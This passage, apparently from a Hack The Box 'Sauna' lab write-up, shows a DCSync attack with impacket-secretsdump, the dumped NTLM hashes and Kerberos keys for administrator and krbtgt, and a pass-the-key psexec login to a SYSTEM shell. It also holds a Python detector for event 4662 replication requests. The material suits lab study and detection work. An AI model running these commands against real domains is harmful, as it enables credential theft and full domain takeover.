DCSync Attack
As previously enumerated with BloodHound, the svc_loanmgr user has DCSync privileges over the domain.
Now that I have validated the credential of the svc_loanmgr user, I should be able to perform the DCSync attack.
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ KRB5CCNAME=svc_loanmgr.ccache impacket-secretsdump EGOTISTICAL-BANK.LOCAL/@sauna.egotistical-bank.local -no-pass -k -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
egotistical-bank.local\hsmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
egotistical-bank.local\fsmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
egotistical-bank.local\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
sauna$:1000:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
egotistical-bank.local\hsmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
egotistical-bank.local\hsmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
egotistical-bank.local\hsmith:des-cbc-md5:1c73b99168d3f8c7
egotistical-bank.local\fsmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
egotistical-bank.local\fsmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
egotistical-bank.local\fsmith:des-cbc-md5:b50e02ab0d85f76b
egotistical-bank.local\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
egotistical-bank.local\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
egotistical-bank.local\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
sauna$:aes256-cts-hmac-sha1-96:169b40d92b9b50b70712649ec010a4941314a10e61443b9249bc483d94012825
sauna$:aes128-cts-hmac-sha1-96:5a9b17710de61c6181ca21a297276b0e
sauna$:des-cbc-md5:ef6d38977fea32d9
[*] Cleaning up...
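From the defender's side, the DRSUAPI replication request above leaves a Windows Security event 4662 on the domain controller whose Properties field carries the replication extended-right GUIDs. The following detection logic is an added example, not part of the original writeup: it scans constructed 4662 records and flags replication requests from any account that is not a known DC computer account (the SAUNA$ allowlist and the sample records are assumptions for this example).

```python
# Detect DCSync-style replication requests in Windows Security event 4662 records.
# Control access right GUIDs are the well-known Active Directory extended rights.
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: domain controller computer accounts.
# Assumption for this example; fill from your own DC inventory.
KNOWN_DC_ACCOUNTS = {"SAUNA$"}

# Constructed sample 4662 records (field names follow the Security log schema).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICAL-BANK",
     "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICAL-BANK",
     "AccessMask": "0x100",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},   # ordinary object access
    {"EventID": 4624, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK"},
]

def replication_rights(properties):
    """Return the replication right names present in a 4662 Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]

def detect_dcsync(events):
    """Return (user, domain, rights) for replication requests by non-DC accounts."""
    hits = []
    for ev in events:
        # 0x100 is the Control Access mask used for extended rights such as replication.
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        if user.upper() in KNOWN_DC_ACCOUNTS:
            continue  # DC-to-DC replication is expected traffic
        hits.append((user, ev.get("SubjectDomainName", ""), rights))
    return hits

if __name__ == "__main__":
    for user, domain, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync: {domain}\\{user} requested {', '.join(rights)}")
```

In practice, the same rule should also treat a replication request from an IP that is not a domain controller as suspicious, since the subject account can be a DC account that was itself compromised.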
Domain Level Compromise
Shelldrop
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-psexec egotistical-bank.local/administrator@sauna.egotistical-bank.local -aesKey 42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file oRHGikoC.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service ZVjP on 10.10.10.175.....
[*] Starting service ZVjP.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
SAUNA
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::17a
IPv6 Address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
Link-local IPv6 Address . . . . . : fe80::64df:5bff:4879:1d8b%7
IPv4 Address. . . . . . . . . . . : 10.10.10.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
10.10.10.2
System Level Compromise